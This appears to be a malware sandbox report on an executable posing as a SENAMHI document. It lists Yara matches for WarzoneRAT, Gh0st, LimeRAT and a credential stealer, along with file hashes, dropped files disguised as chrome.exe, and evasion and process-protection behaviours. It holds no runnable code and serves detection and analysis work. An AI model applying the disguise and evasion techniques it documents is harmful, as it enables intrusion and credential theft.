Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Operating System Destruction
barindex
Protects its processes via BreakOnTermination flag
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Process information set: 01 00 00 00

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 19.0.chrome.exe.a20000.3.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2ff89af.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: 15.2.wtqsCpda..exe.2b22c9c.1.raw.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 15.2.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: LimeRAT payload Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Author: unknown
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\chrome.exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, type: DROPPED Matched rule: LimeRAT payload Author: ditekSHen
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: DocumentoSENAMHI20222103.exe
Detected potential crypto function
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Code function: 1_2_00BDFA9C 1_2_00BDFA9C
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_029341F8 15_2_029341F8
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02936130 15_2_02936130
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293C958 15_2_0293C958
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02934E10 15_2_02934E10
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293AD00 15_2_0293AD00
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_02934540 15_2_02934540
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Code function: 15_2_0293ACF5 15_2_0293ACF5
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B941F8 18_2_02B941F8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B96130 18_2_02B96130
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B94E10 18_2_02B94E10
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 18_2_02B94540 18_2_02B94540
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C41F8 19_2_013C41F8
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C4E10 19_2_013C4E10
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Code function: 19_2_013C4540 19_2_013C4540
Tries to load missing DLLs
Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: sbiedll.dll
Source: C:\Users\user\AppData\Local\Temp\chrome.exe Section loaded: edgegdi.dll
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe 21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\IconLib.dll 087A0C5F789E964A2FBCB781015D3FC9D1757358BC63BB4E0B863B4DFFDB6E4F
Uses 32bit PE files
Source: DocumentoSENAMHI20222103.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.2.chrome.exe.53f0000.7.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.13a0000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.2.chrome.exe.53d0000.1.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.2.DocumentoSENAMHI20222103.exe.2fe053f.4.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118f8a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.117c130.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 18.3.chrome.exe.3e7cd10.0.raw.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.0.chrome.exe.a20000.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 18.3.chrome.exe.3e7cd10.0.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_Lime_RAT date = 2020-12-30, author = Arnim Rupp, description = Detects VB.NET red/black-team tools via typelibguid, reference = https://github.com/NYAN-x-CAT/Lime-RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 1.3.DocumentoSENAMHI20222103.exe.118e030.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
Source: 15.0.wtqsCpda..exe.540000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_LimeRAT author = ditekSHen, description = LimeRAT payload
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 1.3.DocumentoSENAMHI20222103.exe.117a8c0.4.raw.unpack, type: UNPACKEDPE Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
